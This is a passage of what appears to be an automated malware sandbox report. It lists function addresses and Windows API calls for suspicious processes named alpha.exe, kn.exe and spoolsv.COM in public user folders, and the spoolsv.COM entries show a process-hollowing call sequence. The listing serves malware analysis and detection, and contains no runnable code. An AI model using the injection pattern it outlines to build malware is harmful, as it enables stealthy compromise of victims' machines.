              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB13898C NtQueryInformationToken,6_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF7AB1389E4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DEC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF792DEC964
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02908254 NtReadVirtualMemory,10_2_02908254
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029084C4 NtUnmapViewOfSection,10_2_029084C4
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,10_2_0290DACC
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,10_2_0290DA44
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,10_2_0290DBB0
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02908BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02908BB0
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029079B4 NtAllocateVirtualMemory,10_2_029079B4
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02907D00 NtWriteVirtualMemory,10_2_02907D00
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02908BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02908BAE
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029079B2 NtAllocateVirtualMemory,10_2_029079B2
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,10_2_0290D9F0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF7AB137FF8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13898C NtQueryInformationToken,11_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7AB1389E4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,12_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,12_2_00007FF7AB137FF8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,12_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,12_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,12_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13898C NtQueryInformationToken,12_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,12_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,12_2_00007FF7AB1389E4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB125240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB134224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1337D84_2_00007FF7AB1337D8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB12AA544_2_00007FF7AB12AA54
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1342244_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB130A6C4_2_00007FF7AB130A6C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1355544_2_00007FF7AB135554
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB122C484_2_00007FF7AB122C48
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14AC4C4_2_00007FF7AB14AC4C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1378544_2_00007FF7AB137854
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1218844_2_00007FF7AB121884
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1318D44_2_00007FF7AB1318D4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1285104_2_00007FF7AB128510
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB12B0D84_2_00007FF7AB12B0D8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB129B504_2_00007FF7AB129B50
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB12372C4_2_00007FF7AB12372C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB123F904_2_00007FF7AB123F90
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB125B704_2_00007FF7AB125B70
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14AFBC4_2_00007FF7AB14AFBC
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1234104_2_00007FF7AB123410
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB126BE04_2_00007FF7AB126BE0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1252404_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1276504_2_00007FF7AB127650
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB12D2504_2_00007FF7AB12D250
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB129E504_2_00007FF7AB129E50
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1222204_2_00007FF7AB122220
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB124A304_2_00007FF7AB124A30
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14AA304_2_00007FF7AB14AA30
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB12E6804_2_00007FF7AB12E680
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14EE884_2_00007FF7AB14EE88
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB147F004_2_00007FF7AB147F00
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB126EE44_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1515384_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB127D304_2_00007FF7AB127D30
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14D9D04_2_00007FF7AB14D9D0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1281D44_2_00007FF7AB1281D4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB128DF84_2_00007FF7AB128DF8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB12CE104_2_00007FF7AB12CE10
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1337D86_2_00007FF7AB1337D8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB12AA546_2_00007FF7AB12AA54
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1342246_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB130A6C6_2_00007FF7AB130A6C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1355546_2_00007FF7AB135554
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB122C486_2_00007FF7AB122C48
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB14AC4C6_2_00007FF7AB14AC4C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1378546_2_00007FF7AB137854
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1218846_2_00007FF7AB121884
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1318D46_2_00007FF7AB1318D4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1285106_2_00007FF7AB128510
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB12B0D86_2_00007FF7AB12B0D8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB129B506_2_00007FF7AB129B50
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB12372C6_2_00007FF7AB12372C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB123F906_2_00007FF7AB123F90
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB125B706_2_00007FF7AB125B70
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB14AFBC6_2_00007FF7AB14AFBC
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1234106_2_00007FF7AB123410
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB126BE06_2_00007FF7AB126BE0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1252406_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1276506_2_00007FF7AB127650
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB12D2506_2_00007FF7AB12D250
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB129E506_2_00007FF7AB129E50
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1222206_2_00007FF7AB122220
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB124A306_2_00007FF7AB124A30
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB14AA306_2_00007FF7AB14AA30
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB12E6806_2_00007FF7AB12E680
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB14EE886_2_00007FF7AB14EE88
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB147F006_2_00007FF7AB147F00
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB126EE46_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1515386_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB127D306_2_00007FF7AB127D30
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB14D9D06_2_00007FF7AB14D9D0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1281D46_2_00007FF7AB1281D4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB128DF86_2_00007FF7AB128DF8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB12CE106_2_00007FF7AB12CE10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792E038007_2_00007FF792E03800
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DDBC107_2_00007FF792DDBC10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DDC1207_2_00007FF792DDC120
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DDCCB87_2_00007FF792DDCCB8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D02F387_2_00007FF792D02F38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DDF0207_2_00007FF792DDF020
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6D4107_2_00007FF792D6D410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF73F87_2_00007FF792CF73F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF33D47_2_00007FF792DF33D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE33D07_2_00007FF792DE33D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DDB3AC7_2_00007FF792DDB3AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1B36C7_2_00007FF792D1B36C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D273407_2_00007FF792D27340
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D853187_2_00007FF792D85318
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC14F07_2_00007FF792DC14F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D154A07_2_00007FF792D154A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE94A87_2_00007FF792DE94A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D574787_2_00007FF792D57478
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA94947_2_00007FF792DA9494
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9D4607_2_00007FF792D9D460
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3D4407_2_00007FF792D3D440
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3F4347_2_00007FF792D3F434
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF54387_2_00007FF792CF5438
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D431E07_2_00007FF792D431E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0D1B87_2_00007FF792D0D1B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D411C87_2_00007FF792D411C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7F1687_2_00007FF792D7F168
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB511C7_2_00007FF792DB511C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D692D87_2_00007FF792D692D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D592C47_2_00007FF792D592C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4D2C07_2_00007FF792D4D2C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCD2B47_2_00007FF792DCD2B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CFF2C07_2_00007FF792CFF2C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA52907_2_00007FF792DA5290
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0F8007_2_00007FF792D0F800
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5D7F07_2_00007FF792D5D7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D677C87_2_00007FF792D677C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D317D47_2_00007FF792D317D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0B7887_2_00007FF792D0B788
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D497907_2_00007FF792D49790
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D737607_2_00007FF792D73760
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D458CC7_2_00007FF792D458CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D578907_2_00007FF792D57890
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8D8587_2_00007FF792D8D858
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC38747_2_00007FF792DC3874
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8184C7_2_00007FF792D8184C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA38207_2_00007FF792DA3820
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D118307_2_00007FF792D11830
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D795FC7_2_00007FF792D795FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CFF6107_2_00007FF792CFF610
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D555F07_2_00007FF792D555F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC95807_2_00007FF792DC9580
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2B58C7_2_00007FF792D2B58C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2156C7_2_00007FF792D2156C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6F5207_2_00007FF792D6F520
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7F6D87_2_00007FF792D7F6D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCD6DC7_2_00007FF792DCD6DC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DAD6A07_2_00007FF792DAD6A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D476B07_2_00007FF792D476B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA76787_2_00007FF792DA7678
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD76787_2_00007FF792DD7678
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC56607_2_00007FF792DC5660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1D6607_2_00007FF792D1D660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD36387_2_00007FF792DD3638
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D356487_2_00007FF792D35648
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA3C107_2_00007FF792DA3C10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5DBF07_2_00007FF792D5DBF0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D19BC87_2_00007FF792D19BC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF5BA47_2_00007FF792CF5BA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D61B847_2_00007FF792D61B84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CFFB847_2_00007FF792CFFB84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D87B747_2_00007FF792D87B74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9FB507_2_00007FF792D9FB50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBBB287_2_00007FF792DBBB28
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D05D087_2_00007FF792D05D08
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4BCE87_2_00007FF792D4BCE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB9CC07_2_00007FF792DB9CC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D29CD07_2_00007FF792D29CD0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0BCA47_2_00007FF792D0BCA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFFC907_2_00007FF792DFFC90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D71C907_2_00007FF792D71C90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D43C607_2_00007FF792D43C60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2FC207_2_00007FF792D2FC20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4FC347_2_00007FF792D4FC34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF1A107_2_00007FF792CF1A10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1F9B87_2_00007FF792D1F9B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D719AC7_2_00007FF792D719AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7F9907_2_00007FF792D7F990
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE79387_2_00007FF792DE7938
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE994C7_2_00007FF792DE994C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D07AB47_2_00007FF792D07AB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D57AC87_2_00007FF792D57AC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D41A607_2_00007FF792D41A60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA9A587_2_00007FF792DA9A58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D23A407_2_00007FF792D23A40
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6BA487_2_00007FF792D6BA48
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA9FF87_2_00007FF792DA9FF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF1F807_2_00007FF792CF1F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5C0B87_2_00007FF792D5C0B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC20847_2_00007FF792DC2084
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D280807_2_00007FF792D28080
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D580187_2_00007FF792D58018
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D25DF77_2_00007FF792D25DF7
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D01DE87_2_00007FF792D01DE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8BDA07_2_00007FF792D8BDA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFDD847_2_00007FF792DFDD84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA7D707_2_00007FF792DA7D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D49D6C7_2_00007FF792D49D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D51D707_2_00007FF792D51D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2DD207_2_00007FF792D2DD20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D85F047_2_00007FF792D85F04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D79EE47_2_00007FF792D79EE4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D41ED07_2_00007FF792D41ED0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4DEA47_2_00007FF792D4DEA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7DEB07_2_00007FF792D7DEB0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7BE707_2_00007FF792D7BE70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D81E2C7_2_00007FF792D81E2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D144107_2_00007FF792D14410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D784147_2_00007FF792D78414
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D843D07_2_00007FF792D843D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D503987_2_00007FF792D50398
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3E3A07_2_00007FF792D3E3A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D863747_2_00007FF792D86374
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD234C7_2_00007FF792DD234C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D044E07_2_00007FF792D044E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD84D87_2_00007FF792DD84D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7E4F07_2_00007FF792D7E4F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D624D47_2_00007FF792D624D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D364A87_2_00007FF792D364A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D484847_2_00007FF792D48484
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD04907_2_00007FF792DD0490
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D884887_2_00007FF792D88488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CFA4247_2_00007FF792CFA424
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6A4507_2_00007FF792D6A450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6C4507_2_00007FF792D6C450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792E0842F7_2_00007FF792E0842F
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DDE4307_2_00007FF792DDE430
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792E041F87_2_00007FF792E041F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7A1E87_2_00007FF792D7A1E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4C1D07_2_00007FF792D4C1D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF81707_2_00007FF792CF8170
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D101407_2_00007FF792D10140
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4E29C7_2_00007FF792D4E29C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1227C7_2_00007FF792D1227C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D662807_2_00007FF792D66280
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD42747_2_00007FF792DD4274
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB821C7_2_00007FF792DB821C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7C7F07_2_00007FF792D7C7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA07D07_2_00007FF792DA07D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D727D07_2_00007FF792D727D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE67507_2_00007FF792DE6750
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD48C47_2_00007FF792DD48C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD08C87_2_00007FF792DD08C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7E8447_2_00007FF792D7E844
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE28547_2_00007FF792DE2854
